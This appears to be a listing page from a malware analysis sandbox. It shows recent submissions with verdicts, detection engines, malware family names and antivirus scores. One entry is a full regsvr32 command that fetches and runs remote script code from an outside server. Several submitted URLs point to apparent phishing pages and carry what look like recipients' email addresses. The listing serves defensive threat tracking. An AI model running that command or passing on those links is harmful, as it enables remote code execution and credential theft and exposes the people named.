top title background image
Malware  Trends
flash

Detection Sample Info Download Report Classification & Info Graph
Malicious
AV: None
file.exe
2024-11-29 21:07:04 +01:00
Info
Class
Clean
  • Suricata
https://go-sv.linnworks.com/e/743343/-prospect-email-email-nov-2024/c8n95y/1022748667/h/N91-Av-Bt3ARx2p696_2OTgnYniRgKRnf30P40vylAM
2024-11-29 21:05:23 +01:00
Info
Suspicious
  • Suricata
https://click.promotion.zulily.com/f/open-in-app/xune4ox16Ab-tJYGKkYNew~~/AAQRxQA~/RgRpLI7xP4QyAWh0dHBzOi8vd3d3Lnp1bGlseS5jb20vP2NpZD0zNDM2MDImdG9rZW49JmVoaWQ9MUJEMUFBNDI4NjMwRTUwMEUwNjMxMTA2MTQwQTMwRjAmdXRtX21lZGl1bT1lbWFpbCZ1dG1fc291cmNlPUJyYXplJnV0bV9jYW1wYWlnbj0zNDM2MDImc2VudFRpbWU9MTczMjkwNTM4NTk2MSZzZW5kX2lkPWUyZWQxMDlkLWM5YjQtNDk0NS1hM2FlLTM1NWZlNWYzNzBkZSZkaXNwYXRjaF9pZD02NzRhMDlhNTg0ZWNlZTE2OWVlMWY3NDFkNTUzNWNmNCZtaV91PTMwNjE3MTk2MSZtaV9lY21wPWUyZWQxMDlkLWM5YjQtNDk0NS1hM2FlLTM1NWZlNWYzNzBkZVcDc3BjQgpnRvEJSmccswQAUhhqb2FubmEucm9kcmlndWV6QHF2Yy5jb21YBAAAAAE~
2024-11-29 20:52:19 +01:00
Info
Malicious
AV: None
https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpU
2024-11-29 20:36:16 +01:00
No classification & info
no
Graph
Clean
  • Suricata
https://www.earth.com
2024-11-29 20:20:48 +01:00
Info
Malicious
  • Yara
  • Suricata
Mirai, Gafgyt, Okiru
AV: 55%
no Icon
bot.sh4.elf
2024-11-29 20:17:07 +01:00
Info
Class
Malicious
AV: None
https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-DD0015830773-D0002973415
2024-11-29 20:16:22 +01:00
Info
Malicious
  • Yara
  • Sigma
  • Suricata
Amadey, Credential Flusher, LummaC Steal
AV: 55%
file.exe
2024-11-29 20:03:08 +01:00
Info
Class
Suspicious
  • Sigma
FaWdBSmJ.eml
2024-11-29 19:54:04 +01:00
Info
Malicious
  • Sigma
AV: None
no Icon
regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll
2024-11-29 19:53:39 +01:00
Info
Class
Malicious
AV: None
https://clienti.documentipostali.it/#/public/email/a703266c-62aa-4024-8f0c-254725c31c25-
2024-11-29 19:49:54 +01:00
Info
Class
Malicious
AV: None
file.exe
2024-11-29 19:49:08 +01:00
Info
Class
Malicious
  • Yara
Nymaim
AV: 75%
file.exe
2024-11-29 19:49:03 +01:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC Stealer
AV: 45%
file.exe
2024-11-29 19:48:08 +01:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
Amadey, Credential Flusher, Cryptbot, Lu
AV: 55%
file.exe
2024-11-29 19:48:08 +01:00
Info
Class
Malicious
  • Yara
Credential Flusher
AV: 34%
file.exe
2024-11-29 19:48:07 +01:00
Info
Class
Malicious
  • Yara
HTMLPhisher
AV: None
https://economiesocialeestrie-my.sharepoint.com/:f:/g/personal/cynthia_economiesocialeestrie_ca/Eg3bU_gVnldCmtzlGs9oSUQBYKQRNnAURt93MlkOZFbwAg?email=gaston.stratford%40assnat.qc.ca&e=iSpthp&xsdata=MDV8MDJ8R2FzdG9uLlN0cmF0Zm9yZEBhc3NuYXQucWMuY2F8Y2RjYmI0YjE1ZGI0NGZhNmQzYjUwOGRkMTA4MmQxNTh8MWE1NjE5ODBkNjc0NGQzMGEyOTc1ODhjMDdhODMzNTN8MHwwfDYzODY4NDg3NjU1MjMyNTA1OHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SkZiWEIwZVUxaGNHa2lPblJ5ZFdVc0lsWWlPaUl3TGpBdU1EQXdNQ0lzSWxBaU9pSlhhVzR6TWlJc0lrRk9Jam9pVFdGcGJDSXNJbGRVSWpveWZRPT18MHx8fA%3d%3d&sdata=YVp6WGNQM0psVGw2TU5teXRVbmhhMy9VaDRhYW5SeWdTN0pDaTBKV2p2Yz0%3d
2024-11-29 19:32:21 +01:00
Class
no
Graph
Malicious
  • Yara
  • Sigma
  • Suricata
Clipboard Hijacker, Cryptbot
AV: 37%
file.exe
2024-11-29 19:17:07 +01:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
Clipboard Hijacker, Cryptbot
AV: 39%
file.exe
2024-11-29 19:16:06 +01:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
GhostRat, Nitol
AV: 95%
ILQ18dgzMU.exe
2024-11-29 19:11:05 +01:00
Info
Class
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column